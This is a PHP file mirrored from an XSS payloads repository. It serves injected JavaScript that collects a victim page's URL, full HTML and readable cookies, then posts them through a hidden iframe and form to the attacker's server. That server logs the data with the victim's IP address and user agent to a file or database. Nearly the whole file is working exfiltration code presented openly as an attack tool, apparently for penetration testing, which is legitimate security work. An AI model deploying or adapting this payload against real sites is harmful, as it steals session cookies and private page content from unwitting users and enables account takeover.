mirror of
https://github.com/nettitude/xss_payloads.git
synced 2024-11-21 19:53:05 +00:00
164 lines
4.5 KiB
PHP
164 lines
4.5 KiB
PHP
<?php
|
|
header('Content-type: text/javascript');
|
|
error_reporting(E_ALL);
|
|
/**
|
|
Gain situational awareness of where this script executed.
|
|
One to follow up with if you get collaborator / sleepy puppy call back with an asynchronously executed payload
|
|
Effectively does:
|
|
- Cookiestealer
|
|
- Contentstealer
|
|
|
|
payloads, plus:
|
|
- Get URL this was executed on
|
|
- Get URL that this script was referred to with (e.g. if unique identifiers were used)
|
|
- IP, user agent of the user that executed it
|
|
*/
|
|
|
|
// Settings
|
|
|
|
// Pick either DB or file logging by commenting one of these out
|
|
$logging = 'db';
|
|
// $logging = 'file';
|
|
|
|
// If you're using file logging, this is the path of the log file that the web server can write to
|
|
$log_file = '/var/log/xssrecon.log';
|
|
|
|
// If you're using DB logging, set these up and make sure the those creds have access to the schema
|
|
$db_user = 'xssrecon';
|
|
$db_pass = 'xssrecon';
|
|
$db_name = 'xssrecon';
|
|
$db_host = 'localhost';
|
|
|
|
// Use this SQL to set up the DB
|
|
// CREATE TABLE log ( id int NOT NULL AUTO_INCREMENT, logtime DATETIME, method varchar(10), pageurl varchar(255), scripturl varchar(255), referer varchar(255), cookies varchar(255), useragent varchar(255), userip varchar(20), html TEXT, PRIMARY KEY (id) )
|
|
|
|
$url = 'http';
|
|
if( !empty( $_SERVER['HTTPS'] ) ){
|
|
$url .= 's';
|
|
}
|
|
$url .= "://";
|
|
if( empty( $_SERVER['HTTP_HOST'] ) ){
|
|
$url .= $_SERVER["SERVER_ADDR"];
|
|
}else{
|
|
$url .= $_SERVER['HTTP_HOST'];
|
|
}
|
|
$url .= $_SERVER["PHP_SELF"];
|
|
|
|
if( empty( $_POST["c"] ) ){
|
|
|
|
?>
|
|
|
|
// Send back
|
|
function xssSendContent(content){
|
|
document.getElementById('info').value = content;
|
|
window.onload = null;
|
|
document.getElementById('form_xss').submit();
|
|
}
|
|
function xssGatherInfo(){
|
|
|
|
var info = {};
|
|
|
|
// Current URL
|
|
info.pageurl = document.location.href;
|
|
|
|
// Contents of current page
|
|
info.html = document.documentElement.outerHTML;
|
|
|
|
// Any non HttpOnly cookies present
|
|
info.cookies = document.cookies
|
|
|
|
document.documentElement.innerHTML += 'A';
|
|
if( !document.getElementById('frame_xss') ){
|
|
frame = document.createElement('iframe');
|
|
frame.style='visibility: hidden;';
|
|
frame.name='frame_xss';
|
|
form = document.createElement('form');
|
|
form.action = '<?php echo $url; ?>'
|
|
|
|
form.target = 'frame_xss';
|
|
form.method='POST';
|
|
form.id = 'form_xss';
|
|
e = document.createElement('input');
|
|
e.type = 'hidden';
|
|
e.name = 'c';
|
|
e.id = 'info';
|
|
form.appendChild(e);
|
|
body = document.getElementsByTagName('body')
|
|
if( body.length = 0 ){
|
|
document.documentElement.appendChild(document.createElement('body'));
|
|
body = document.getElementsByTagName('body')
|
|
}
|
|
body = body[0];
|
|
body.appendChild(frame);
|
|
body.appendChild(form);
|
|
}
|
|
xssSendContent(btoa(JSON.stringify(info)));
|
|
}
|
|
window.onload = xssGatherInfo;
|
|
|
|
<?php
|
|
|
|
}else{
|
|
|
|
// If you've got POST data coming in, record it
|
|
echo $_POST['c'];
|
|
|
|
$info = json_decode(base64_decode($_POST['c']));
|
|
|
|
}
|
|
|
|
if( !isset( $info ) ){
|
|
$info = new StdClass();
|
|
}
|
|
|
|
// URL of the script itself
|
|
$info->scripturl = $url;
|
|
|
|
// Referer
|
|
$info->referer = $_SERVER['HTTP_REFERER'];
|
|
|
|
// User's user agent
|
|
$info->useragent = $_SERVER['HTTP_USER_AGENT'];
|
|
|
|
// User's IP address
|
|
$info->userip = $_SERVER['REMOTE_ADDR'];
|
|
|
|
$info->method = $_SERVER['REQUEST_METHOD'];
|
|
|
|
$info->logtime = date('Y-m-d H:i:s');
|
|
|
|
$aProperties = array( 'logtime', 'method', 'pageurl', 'scripturl', 'referer', 'cookies', 'useragent', 'userip', 'html' );
|
|
|
|
// Log this request
|
|
if( $logging == 'file' ){
|
|
// File logging
|
|
|
|
$str = '';
|
|
$str .= "\n\n===START XSS INFO===\n\n";
|
|
foreach( $aProperties as $prop ){
|
|
if( !property_exists( $info, $prop ) ) continue;
|
|
$str .= $prop.": ".$info->{$prop}."\n";
|
|
}
|
|
$str .= "\n\n===END XSS INFO===\n\n";
|
|
file_put_contents( $log_file, $str, FILE_APPEND );
|
|
}else{
|
|
// DB logging
|
|
|
|
$db = new PDO("mysql:host={$db_host};dbname={$db_name};charset=utf8", $db_user, $db_pass);
|
|
$present = "";
|
|
$markers = "";
|
|
$comma = "";
|
|
$data = array();
|
|
foreach( $aProperties as $prop ){
|
|
if( !property_exists( $info, $prop ) ) continue;
|
|
$present .= $comma.' '.$prop;
|
|
$markers .= $comma." ?";
|
|
$data[] = $info->{$prop};
|
|
$comma = ",";
|
|
}
|
|
$sql = "INSERT INTO log (".$present." ) VALUES (".$markers." )";
|
|
$stmt = $db->prepare($sql);
|
|
$stmt->execute($data);
|
|
}
|
|
|
|
?>
|